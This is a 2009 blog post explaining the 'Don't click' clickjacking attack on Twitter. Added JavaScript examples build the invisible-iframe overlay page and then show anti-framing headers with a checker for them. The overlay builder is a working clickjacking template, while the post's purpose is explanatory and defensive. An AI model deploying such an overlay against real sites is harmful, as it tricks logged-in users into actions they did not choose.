Christian Heilmann

Don’t click this – a clickjacking experiment currently hammering twitter

Thursday, February 12th, 2009 at 7:29 pm

Reverse psychology is an interesting thing. Right now Twitter is being hammered by thousands of people tweeting about a page that has a button telling them not to click it. Why do they click it? Because they are told not to. But why do they then tweet about it, without ever typing a tweet? A small thing called clickjacking.

Scott Schiller shows in a screenshot how the trick works:

The page with the “don’t click” button actually has an iframe layered over that button. The iframe loads your own twitter.com/home page (you are logged in, so it comes up with your session) with the tweet about the site already filled into the status box. The iframe is positioned so that your “update” button sits exactly on top of the “don’t click this” button, and it is given an opacity of 0: you cannot see the frame, but it is the topmost element, so the click lands on Twitter’s submit button and you post the tweet without knowing it.
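To make the layout concrete, here is an added example written for this page; it is not the code of the page described in the post. It reconstructs the overlay in plain JavaScript: the decoy button, the invisible iframe, and the positioning arithmetic that makes the framed page’s submit button land on the decoy. All coordinates, the decoy markup and the use of a `?status=` parameter on twitter.com/home to prefill the tweet are assumptions made for this illustration.

```javascript
// Added example, not the original attack page. Reconstructs the clickjacking
// layout described in the post; every number and the ?status= prefill
// parameter are assumptions for illustration.

// Where the visible "Don't click" decoy button sits on the attacker's page
// (CSS pixels relative to the page's top-left corner). Constructed values.
const DECOY_BUTTON = { left: 300, top: 200, width: 120, height: 40 };

// Where the "update" submit button sits inside the framed twitter.com/home
// page, relative to the frame's own top-left corner. Constructed values; an
// attacker measures these once in a browser while logged in.
const TARGET_BUTTON = { left: 560, top: 310, width: 120, height: 40 };

// Offset at which the iframe must be absolutely positioned so that the target
// page's button lands exactly on top of the decoy button. Negative values
// mean the frame's top-left corner is pushed off the visible page.
function computeOverlay(decoy, target) {
  return { left: decoy.left - target.left, top: decoy.top - target.top };
}

// The framed page is loaded with the tweet text already in the status box, so
// the victim's only remaining action is the click on "update".
// encodeURIComponent escapes '"' (but not "'"), so the value cannot break out
// of the double-quoted src attribute below.
function buildStatusUrl(base, status) {
  return base + '?status=' + encodeURIComponent(status);
}

// Assemble the attacker's page: decoy button underneath, invisible iframe on
// top. opacity:0 hides the frame but it still receives pointer events, and the
// higher z-index guarantees the click never reaches the decoy button.
function buildClickjackPage(targetUrl, decoy, target) {
  const pos = computeOverlay(decoy, target);
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;left:${decoy.left}px;top:${decoy.top}px;` +
      `width:${decoy.width}px;height:${decoy.height}px">Don\u2019t click this</button>`,
    `<iframe src="${targetUrl}" scrolling="no" frameborder="0" ` +
      `style="position:absolute;left:${pos.left}px;top:${pos.top}px;` +
      'width:1000px;height:800px;opacity:0;z-index:2"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Usage (assumed target URL and tweet text):
const page = buildClickjackPage(
  buildStatusUrl('https://twitter.com/home', "Don't Click"),
  DECOY_BUTTON,
  TARGET_BUTTON
);
```

Nothing in the visible page gives the overlay away: the decoy button renders normally, and the frame contributes no pixels. That is why the advice to be careful what you click only goes so far; the framed site has to refuse to be loaded inside another site’s frame.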

The scam works. If you search Twitter for “don’t click” right now you will find a steady stream of fresh tweets arriving every few seconds. There is also a French version in the wild.

So if you get the tweet, don’t follow the link. If you land on a page that wants you to click a single button, be very wary of what is going on there! Because the overlay is invisible, vigilance alone only goes so far: the durable fix is for the framed site to refuse to be loaded inside another site’s frame.
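The post ends with advice to the user; the control that actually ends this class of attack sits on the framed site. The following is an added example, not code from this post or from Twitter: the response headers a site sends to refuse framing, and a checker that decides from a response’s headers whether a given origin could embed the page. The header names and values are real; the sample headers and origins used in the comments and test are constructed.

```javascript
// Added example (not from the post): server-side anti-framing headers and a
// checker that evaluates them the way a browser would. Sample origins such as
// https://attacker.example are constructed for illustration.

// What a site sends to refuse framing. X-Frame-Options is the older header;
// CSP frame-ancestors is the current one and takes precedence when both exist.
const PROTECTIVE_HEADERS = {
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "frame-ancestors 'none'",
};

// Header names are case-insensitive; normalise so lookups are reliable.
function normalizeHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = String(value).trim();
  }
  return out;
}

// Returns true if a page served with `headers` from `pageOrigin` could be
// embedded in an <iframe> by a page at `framerOrigin`.
// Simplifications: only exact origin matches for CSP host sources (no
// wildcards or scheme-only sources), and a single CSP header.
function canBeFramedBy(headers, framerOrigin, pageOrigin) {
  const h = normalizeHeaders(headers);
  const framer = framerOrigin.toLowerCase();
  const page = pageOrigin.toLowerCase();

  // 1. CSP frame-ancestors, if present, decides on its own.
  const csp = h['content-security-policy'];
  if (csp) {
    const directive = csp
      .split(';')
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return false;
      if (sources.includes('*')) return true;
      if (sources.includes('self') && framer === page) return true;
      return sources.includes(framer);
    }
  }

  // 2. Otherwise fall back to X-Frame-Options. Any value other than DENY or
  //    SAMEORIGIN (including the obsolete ALLOW-FROM) is treated as no
  //    protection, which is how browsers that reject the value behave.
  const xfo = (h['x-frame-options'] || '').toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framer === page;

  // 3. No anti-framing header at all: anyone can frame the page. This was the
  //    state of twitter.com/home when the "don't click" page appeared.
  return true;
}
```

Run the checker over a response captured from the site you are auditing: if `canBeFramedBy(headers, 'https://attacker.example', siteOrigin)` returns true, an invisible-iframe page like the one above will work against any logged-in user. A JavaScript frame-buster (`if (top !== self) top.location = self.location`) is a weaker stopgap; it runs inside the victim page and can be defeated, whereas the headers are enforced by the browser before the page is shown.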
